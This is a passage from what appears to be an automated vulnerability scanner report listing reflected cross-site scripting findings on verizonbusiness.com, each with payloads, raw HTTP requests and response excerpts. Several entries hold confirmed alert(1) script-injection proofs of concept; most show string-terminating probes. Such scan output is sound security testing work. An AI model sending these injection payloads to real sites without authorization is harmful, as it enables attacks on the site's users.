This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesad609"%3bb9494151c4e/1002a3a7-111-Virtual+Tours+(Demos HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:30:41 GMT
Content-Type: text/html
Content-Length: 40666
Date: Wed, 17 Nov 2010 00:30:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:30:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesad609";b9494151c4e/1002a3a7-111-Virtual+Tours+(Demos";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM
...[SNIP]...

1.742. http://www.verizonbusiness.com/resources/1002a3a7-111-Virtual+Tours+(Demos [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a7-111-Virtual+Tours+(Demos

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14dfa'%3b457919f1d70 was submitted in the REST URL parameter 1. This input was echoed as 14dfa';457919f1d70 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources14dfa'%3b457919f1d70/1002a3a7-111-Virtual+Tours+(Demos HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:31:01 GMT
Content-Type: text/html
Content-Length: 40668
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:31:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:31:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources14dfa';457919f1d70/1002a3a7-111-Virtual+Tours+(Demos'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.743. http://www.verizonbusiness.com/resources/1002a3a7-111-Virtual+Tours+(Demos [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a7-111-Virtual+Tours+(Demos

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb3d0</script><script>alert(1)</script>16990b32f17 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a3a7-111-Virtual+Tours+(Demosbb3d0</script><script>alert(1)</script>16990b32f17 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "38eb5c7c7bc893ea759f98c994c55ad9"
Last-Modified: Wed, 17 Nov 2010 00:32:06 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:32:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3dd8a33a40-5f6c-410d-aa10-0ac88beb3ec4|VTID%3d23fc11a3-ebde-49c2-9bfc-a606e9773847|SX%3d1289955126|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:35:50 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:32:06 GMT
Content-Length: 33730

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<url>/resources/1002a3a7-111-Virtual+Tours+(Demosbb3d0</script><script>alert(1)</script>16990b32f17</url>
...[SNIP]...

1.744. http://www.verizonbusiness.com/resources/1002a3a7-111-Virtual+Tours+(Demos [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a7-111-Virtual+Tours+(Demos

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f69fa'%3bd46aa6d4220 was submitted in the REST URL parameter 2. This input was echoed as f69fa';d46aa6d4220 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/f69fa'%3bd46aa6d4220 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:32:17 GMT
Content-Type: text/html
Content-Length: 40212
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:32:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:32:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/f69fa';d46aa6d4220'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.745. http://www.verizonbusiness.com/resources/1002a3a7-111-Virtual+Tours+(Demos).xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a7-111-Virtual+Tours+(Demos).xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93dba'%3b1539627f493 was submitted in the REST URL parameter 1. This input was echoed as 93dba';1539627f493 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources93dba'%3b1539627f493/1002a3a7-111-Virtual+Tours+(Demos).xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:30:15 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40676
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:30:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:30:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources93dba';1539627f493/1002a3a7-111-Virtual+Tours+(Demos).xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.746. http://www.verizonbusiness.com/resources/1002a3a7-111-Virtual+Tours+(Demos).xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a7-111-Virtual+Tours+(Demos).xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 910e3"%3b195ec62a14f was submitted in the REST URL parameter 1. This input was echoed as 910e3";195ec62a14f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources910e3"%3b195ec62a14f/1002a3a7-111-Virtual+Tours+(Demos).xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:30:03 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40676
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:30:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:30:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources910e3";195ec62a14f/1002a3a7-111-Virtual+Tours+(Demos).xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MI
...[SNIP]...

1.747. http://www.verizonbusiness.com/resources/1002a3a7-111-Virtual+Tours+(Demos).xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a7-111-Virtual+Tours+(Demos).xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8878</script><script>alert(1)</script>8ecbe35d2c3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a3a7-111-Virtual+Tours+(Demos).xmla8878</script><script>alert(1)</script>8ecbe35d2c3 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "21cfc08239c239bd84159626542afbf6"
Last-Modified: Wed, 17 Nov 2010 00:31:18 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:31:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d63e70ec3-4f17-4267-9890-57b910eee1ce|VTID%3da3522847-85d4-4945-8725-df4f82125a8b|SX%3d1289955078|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:35:02 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:31:18 GMT
Content-Length: 33851

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<url>/resources/1002a3a7-111-Virtual+Tours+(Demos).xmla8878</script><script>alert(1)</script>8ecbe35d2c3</url>
...[SNIP]...

1.748. http://www.verizonbusiness.com/resources/1002a3a7-111-Virtual+Tours+(Demos).xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a7-111-Virtual+Tours+(Demos).xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8db7e'%3bc71501f142d was submitted in the REST URL parameter 2. This input was echoed as 8db7e';c71501f142d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/8db7e'%3bc71501f142d HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:31:24 GMT
Content-Type: text/html
Content-Length: 40212
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:31:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:31:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/8db7e';c71501f142d'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.749. http://www.verizonbusiness.com/resources/1002a3a8-111-White+Papers.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a8-111-White+Papers.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6cee'%3b9e5b2f0d456 was submitted in the REST URL parameter 1. This input was echoed as c6cee';9e5b2f0d456 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesc6cee'%3b9e5b2f0d456/1002a3a8-111-White+Papers.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:31:12 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40658
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:31:12 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:31:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resourcesc6cee';9e5b2f0d456/1002a3a8-111-White+Papers.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.750. http://www.verizonbusiness.com/resources/1002a3a8-111-White+Papers.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a8-111-White+Papers.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1b49"%3b9bc1af73402 was submitted in the REST URL parameter 1. This input was echoed as e1b49";9bc1af73402 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcese1b49"%3b9bc1af73402/1002a3a8-111-White+Papers.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:30:54 GMT
Content-Type: text/html
Content-Length: 40660
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:30:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:30:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcese1b49";9bc1af73402/1002a3a8-111-White+Papers.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELE
...[SNIP]...

1.751. http://www.verizonbusiness.com/resources/1002a3a8-111-White+Papers.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a8-111-White+Papers.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f1bc</script><script>alert(1)</script>bce0008b5c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a3a8-111-White+Papers.xml5f1bc</script><script>alert(1)</script>bce0008b5c HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "a187ef71b5868d3849248bcda99ef5f3"
Last-Modified: Wed, 17 Nov 2010 00:32:58 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:32:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3de1026a3f-781b-4cd8-a2b6-4ce08b94e4d8|VTID%3ddd9978d7-bb03-4ece-9acf-ad882f263743|SX%3d1289955178|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:36:42 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:32:58 GMT
Content-Length: 51158

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<url>/resources/1002a3a8-111-White+Papers.xml5f1bc</script><script>alert(1)</script>bce0008b5c</url>
...[SNIP]...

1.752. http://www.verizonbusiness.com/resources/1002a3a8-111-White+Papers.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a8-111-White+Papers.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d503'%3b72fd53023a5 was submitted in the REST URL parameter 2. This input was echoed as 3d503';72fd53023a5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/3d503'%3b72fd53023a5 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:33:00 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:33:00 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:33:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/3d503';72fd53023a5'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.753. http://www.verizonbusiness.com/resources/1002a3a9-111-Webinars+&+Videos.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a9-111-Webinars+&+Videos.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41131"%3b2f62563757c was submitted in the REST URL parameter 1. This input was echoed as 41131";2f62563757c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources41131"%3b2f62563757c/1002a3a9-111-Webinars+&+Videos.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:29:53 GMT
Content-Type: text/html
Content-Length: 40670
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:29:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:29:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources41131";2f62563757c/1002a3a9-111-Webinars+&+Videos.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
